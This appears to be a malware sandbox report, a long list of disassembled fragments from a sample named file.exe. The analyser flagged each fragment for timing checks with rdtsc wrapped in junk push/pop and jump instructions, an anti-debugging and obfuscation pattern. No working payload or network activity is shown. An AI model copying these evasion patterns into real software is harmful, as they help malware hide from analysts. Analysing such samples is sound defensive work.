Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676D44 second address: 676D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677054 second address: 677069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC73Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677069 second address: 677075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBA4817E76h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677372 second address: 677396 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC74Dh 0x00000008 jmp 00007FCBA46BC747h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ED3A second address: 67ED3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ED3E second address: 67ED4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F5AF second address: 67F5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67FB7D second address: 67FB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC740h 0x00000009 jmp 00007FCBA46BC73Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680115 second address: 68011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68011B second address: 680128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680128 second address: 68012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68012C second address: 68013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBA46BC736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 684243 second address: 684249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 684249 second address: 684293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 jmp 00007FCBA46BC747h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f je 00007FCBA46BC748h 0x00000015 jmp 00007FCBA46BC742h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68386C second address: 68388C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68388C second address: 68389B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jnc 00007FCBA46BC736h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683E1A second address: 683E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683E20 second address: 683E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683F65 second address: 683F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FCBA4817E76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 683F75 second address: 683F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F441 second address: 68F44E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F44E second address: 68F453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F453 second address: 68F45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FCBA4817E76h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F45F second address: 68F463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F8A8 second address: 68F8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA4817E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F8B2 second address: 68F8BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F8BC second address: 68F8CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA30 second address: 68FA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA34 second address: 68FA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA38 second address: 68FA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FA3E second address: 68FA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68FCD4 second address: 68FCD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6900E9 second address: 6900F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FCBA4817E76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69110C second address: 691112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691112 second address: 691116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F018 second address: 68F02E instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FCBA46BC736h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68F02E second address: 68F048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FCBA4817E7Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6938B3 second address: 6938B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6938B9 second address: 6938BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A9A6 second address: 69A9E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC746h 0x00000008 push edi 0x00000009 jmp 00007FCBA46BC742h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FCBA46BC73Bh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A9E4 second address: 69A9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCBA4817E76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9BD2 second address: 5D9BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007FCBA46BC73Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FCBA46BC742h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A3BB second address: 69A3EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E7Bh 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FCBA4817E76h 0x00000015 jmp 00007FCBA4817E85h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A3EB second address: 69A410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCBA46BC745h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69A410 second address: 69A426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A73EB second address: 6A73FB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC742h 0x00000008 jp 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7012 second address: 6A701C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBA4817E76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A701C second address: 6A7020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A713A second address: 6A714A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FCBA4817E76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A714A second address: 6A714E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A714E second address: 6A7152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A7152 second address: 6A716D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC73Bh 0x0000000f jnl 00007FCBA46BC736h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AA569 second address: 6AA58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 js 00007FCBA4817E92h 0x0000000e push edi 0x0000000f jmp 00007FCBA4817E84h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6B79D4 second address: 6B79FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCBA46BC736h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FCBA46BC749h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C7359 second address: 6C737B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 jng 00007FCBA4817E76h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C737B second address: 6C7389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C5DA0 second address: 6C5DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C61E3 second address: 6C61FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007FCBA46BC741h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C61FD second address: 6C6216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCBA4817E81h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6375 second address: 6C6389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC73Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6389 second address: 6C63A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E7Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63A3 second address: 6C63B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FCBA46BC736h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63B0 second address: 6C63BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCBA4817E76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63BC second address: 6C63C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C63C0 second address: 6C63C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6534 second address: 6C6539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6539 second address: 6C653F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C653F second address: 6C6545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C6684 second address: 6C669C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jl 00007FCBA4817E76h 0x00000010 popad 0x00000011 popad 0x00000012 push esi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8BAA second address: 6C8BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C8BB0 second address: 6C8BB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC05C second address: 6CC061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6CC1A7 second address: 6CC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCBA4817E76h 0x0000000a jnc 00007FCBA4817E76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0852 second address: 49F08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA4817E87h 0x00000008 pushfd 0x00000009 jmp 00007FCBA4817E88h 0x0000000e jmp 00007FCBA4817E85h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+20h] 0x0000001a pushad 0x0000001b mov eax, 37EDEE83h 0x00000020 pushfd 0x00000021 jmp 00007FCBA4817E88h 0x00000026 and si, D648h 0x0000002b jmp 00007FCBA4817E7Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esi+40h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FCBA4817E85h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F08EC second address: 49F0956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FCBA46BC743h 0x0000000b sub cx, 8DEEh 0x00000010 jmp 00007FCBA46BC749h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f jmp 00007FCBA46BC73Eh 0x00000024 push 00000001h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FCBA46BC747h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0956 second address: 49F095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F095C second address: 49F0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0960 second address: 49F09CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FCBA4817E88h 0x0000001b and esi, 199B4558h 0x00000021 jmp 00007FCBA4817E7Bh 0x00000026 popfd 0x00000027 mov ebx, esi 0x00000029 popad 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e jmp 00007FCBA4817E82h 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a mov dh, 86h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09CA second address: 49F09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09D0 second address: 49F09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E7Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A65 second address: 49F0A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A6B second address: 49F0AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA4817E7Ch 0x00000009 sub ecx, 2867D398h 0x0000000f jmp 00007FCBA4817E7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e js 00007FCC16FE6AA3h 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edx 0x00000027 mov di, si 0x0000002a popad 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FCBA4817E86h 0x00000035 adc eax, 6766D858h 0x0000003b jmp 00007FCBA4817E7Bh 0x00000040 popfd 0x00000041 mov ah, 59h 0x00000043 popad 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBA4817E7Eh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0AE6 second address: 49F0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d mov al, E7h 0x0000000f mov bx, BC94h 0x00000013 popad 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov al, A8h 0x0000001b pushfd 0x0000001c jmp 00007FCBA46BC741h 0x00000021 or ax, 6006h 0x00000026 jmp 00007FCBA46BC741h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0B31 second address: 49F0BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA4817E87h 0x00000009 xor ecx, 50AA2F3Eh 0x0000000f jmp 00007FCBA4817E89h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FCBA4817E80h 0x0000001b or ax, 6C38h 0x00000020 jmp 00007FCBA4817E7Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FCBA4817E7Bh 0x00000033 and si, 49FEh 0x00000038 jmp 00007FCBA4817E89h 0x0000003d popfd 0x0000003e mov dx, si 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0BC4 second address: 49F0BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9F5Eh 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA46BC747h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0BEB second address: 49F0C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0C25 second address: 49F0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0C29 second address: 49F0C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
